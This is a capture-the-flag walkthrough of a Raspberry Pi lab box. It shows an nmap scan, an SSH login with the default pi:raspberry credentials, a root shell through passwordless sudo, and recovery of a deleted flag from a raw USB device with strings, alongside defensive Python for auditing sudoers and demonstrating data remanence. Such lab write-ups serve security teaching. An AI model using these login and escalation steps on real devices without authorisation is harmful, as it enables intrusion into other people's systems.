Mirai identifies vulnerable IoT devices using a table of more than 60 common factory default usernames and passwords, logs into them and infects them with the Mirai malware.
Vulnerability Explanation: It is possible to access the machine over SSH using the default credentials of the Raspberry Pi. Raspberry Pi OS through 5.10 ships with the default password "raspberry" for the pi account. If it is not changed, attackers can gain administrator privileges.
Vulnerability Fix: Always change the default password of the user and root accounts on any new installation.
Privilege Escalation Vulnerability: No privilege escalation needed (the pi user can run any command through sudo without a password).
Vulnerability Fix: The developer should have followed the principle of least privilege and the separation of privileges.
Severity: Critical
An initial nmap scan revealed lighttpd 1.4.35 running on port 80, dnsmasq 2.76 on port 53 and SSH on port 22:
# Nmap 7.92 scan initiated Mon Jan 24 05:37:52 2022 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.48
Nmap scan report for 10.10.10.48
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 24 05:38:16 2022 -- 1 IP address (1 host up) scanned in 23.34 seconds
Using the Raspberry Pi defaults, the SSH username and password are pi:raspberry:
pi@raspberrypi:~/Desktop $ cat user.txt && hostname && whoami && ip a
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
raspberrypi
pi
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:50:56:b9:e6:10 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.48/24 brd 10.10.10.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb9:e610/64 scope link
valid_lft forever preferred_lft forever
inet6 fe80::74dd:973a:91e9:2497/64 scope link
valid_lft forever preferred_lft forever
Privilege Escalation
Checking the sudo permissions of the pi user:
pi@raspberrypi:~/Desktop $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
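The second grant above, (ALL) NOPASSWD: ALL, is what makes the pi account equivalent to root: anyone holding the default password owns the machine without a second check. The script below is an added example (not part of the original write-up) of how an administrator can audit a sudoers file for exactly this condition. The sudoers content it scans is constructed here to mirror what sudo -l reported; the parser and the severity labels are this example's own, not sudo's.

```python
import re

# Constructed sample /etc/sudoers (not copied from the box). The two "pi" grants
# reproduce what `sudo -l` reported above; the other lines are typical entries.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
pi      ALL=(ALL:ALL) ALL
pi      ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
%admin  ALL=(ALL) ALL
"""

# Lines that are not user specifications and must not be parsed as such.
SKIP_PREFIXES = {"Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias",
                 "@include", "@includedir"}

# Tags sudoers allows in front of a command list, each terminated by ':'.
KNOWN_TAGS = {"PASSWD", "NOPASSWD", "EXEC", "NOEXEC", "SETENV", "NOSETENV",
              "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
              "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW"}

# user_spec:  <who> <hosts>=(<runas>) [TAG: ...] <command list>
SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.+)$"
)


def parse_user_spec(line):
    """Split one sudoers user specification into its parts; None if it is not one."""
    m = SPEC_RE.match(line)
    if not m:
        return None
    tokens = m.group("rest").split()
    tags = set()
    while tokens and tokens[0].endswith(":") and tokens[0][:-1] in KNOWN_TAGS:
        tags.add(tokens.pop(0)[:-1])
    cmds = [c.strip() for c in " ".join(tokens).split(",") if c.strip()]
    return {"who": m.group("who"), "hosts": m.group("hosts"),
            "runas": m.group("runas") or "root", "tags": tags, "cmds": cmds}


def audit_sudoers(text):
    """Return (line_no, severity, who, reason) for every grant worth a second look."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line or line.split()[0] in SKIP_PREFIXES:
            continue
        spec = parse_user_spec(line)
        if spec is None:
            continue
        if "ALL" in spec["cmds"]:
            if "NOPASSWD" in spec["tags"]:
                findings.append((n, "CRITICAL", spec["who"],
                                 "any command as root with no password: this account IS root"))
            elif spec["who"] != "root":               # root having full sudo is expected
                findings.append((n, "HIGH", spec["who"],
                                 "unrestricted sudo; needs a strong, non-default password"))
        elif "NOPASSWD" in spec["tags"]:
            findings.append((n, "INFO", spec["who"],
                             "passwordless sudo limited to: " + ", ".join(spec["cmds"])))
    return findings


def has_passwordless_root(text):
    """True if any account can become root without being asked for a password."""
    return any(sev == "CRITICAL" for _, sev, _, _ in audit_sudoers(text))


if __name__ == "__main__":
    for line_no, sev, who, why in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {line_no}: [{sev}] {who}: {why}")
    # Remediation: remove the NOPASSWD grant, keep "pi ALL=(ALL:ALL) ALL" only if pi is
    # a real administrator with a changed password, or list the specific commands needed.
```

Run against the real file with `visudo -c` first (so a syntax error never locks you out), then pass the file contents to audit_sudoers. The CRITICAL case is the one this box exhibited; fixing it means deleting the NOPASSWD line, and the default-password finding from the previous section is what turns the HIGH grant into a compromise.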
Running sudo su gives a root shell without a password prompt:
pi@raspberrypi:~/Desktop $ sudo su
root@raspberrypi:/home/pi/Desktop# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
root@raspberrypi:/home/pi/Desktop#
The content of root.txt states that the root flag is on the USB stick.
To list the devices attached to the system and their mount points, run the df command:
The USB stick is /dev/sdb, mounted on /media/usbstick.
The file was deleted, so we need to recover it:
Deleting a file only removes its directory entry; the data blocks stay on the device. Reading the raw block device /dev/sdb directly (here with strings) therefore still shows the previous content of the USB stick, including the deleted root.txt:
root.txt
root@raspberrypi:/dev# strings sdb | grep -i 3d3e483143ff12ec505d026fa13e020b && hostname && whoami && ip a
3d3e483143ff12ec505d026fa13e020b
raspberrypi
root
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:50:56:b9:e6:10 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.48/24 brd 10.10.10.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb9:e610/64 scope link
valid_lft forever preferred_lft forever
inet6 fe80::74dd:973a:91e9:2497/64 scope link
valid_lft forever preferred_lft forever
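The recovery above works because an ordinary delete only frees the directory entry; the file's bytes stay on the medium until something overwrites them. The following is an added example (not code from the write-up) that makes this visible on a tiny constructed disk image: it "deletes" a file the way FAT does (marking the entry free), carves printable strings from the raw bytes the way strings does, and then shows that only overwriting the data blocks actually removes the content. The image layout, the file name and the flag value are constructed for the example; this is not a real FAT implementation.

```python
SECTOR = 512

# Constructed sample content standing in for the real flag (not the box's value).
FLAG = b"CONSTRUCTED_FLAG_0123456789abcdef"


def make_image(filename, content):
    """Build a tiny constructed 'volume': sector 0 = label, sector 1 = directory,
    sectors 2+ = file data. Only enough structure to show where the bytes live."""
    img = bytearray(SECTOR * 8)
    img[0:11] = b"CONSTRUCTED"
    entry = (filename.encode().ljust(11, b" ")[:11]   # 11-byte name field
             + b"\x20"                                 # attribute byte (archive)
             + (2).to_bytes(2, "little")               # first data sector
             + len(content).to_bytes(4, "little"))     # file size
    img[SECTOR:SECTOR + len(entry)] = entry
    img[2 * SECTOR:2 * SECTOR + len(content)] = content
    return img


def delete_file(img):
    """Ordinary deletion: mark the directory entry free (0xE5, as FAT does).
    The data sectors are deliberately left untouched, exactly like a real rm."""
    img[SECTOR] = 0xE5
    return img


def secure_wipe_file(img, start_sector, length):
    """What shred / blkdiscard achieve: overwrite the data blocks themselves."""
    off = start_sector * SECTOR
    img[off:off + length] = bytes(length)
    return img


def directory_lists(img, filename):
    """Would a directory listing of the mounted stick still show this file?"""
    return img[SECTOR:SECTOR + 11].rstrip(b" ") == filename.encode()[:11]


def carve_strings(data, min_len=4):
    """Minimal re-implementation of `strings -n 4`: runs of printable ASCII."""
    out, run = [], bytearray()
    for b in data:
        if 0x20 <= b <= 0x7E or b == 0x09:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode("ascii"))
    return out


if __name__ == "__main__":
    img = make_image("root.txt", FLAG)
    delete_file(img)
    print("listed after delete:", directory_lists(img, "root.txt"))      # False
    print("still carvable   :", FLAG.decode() in carve_strings(bytes(img)))  # True
    secure_wipe_file(img, 2, len(FLAG))
    print("after wipe       :", FLAG.decode() in carve_strings(bytes(img)))  # False
```

For a defender the lesson is the mirror image of the recovery step: secrets on removable media are not gone after rm, so decommissioning or reusing a stick requires overwriting (or discarding) the blocks, and storing the secret encrypted in the first place means the carved bytes are useless anyway.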
Lessons Learned
To gain an initial foothold on the box we exploited two vulnerabilities:
Use of default credentials. The user kept the default password that ships with the system. Since default credentials are publicly available and easily obtained, the user should have instead set a sufficiently long password that is difficult to crack.
Always separate the privileges of normal users from those of administrators.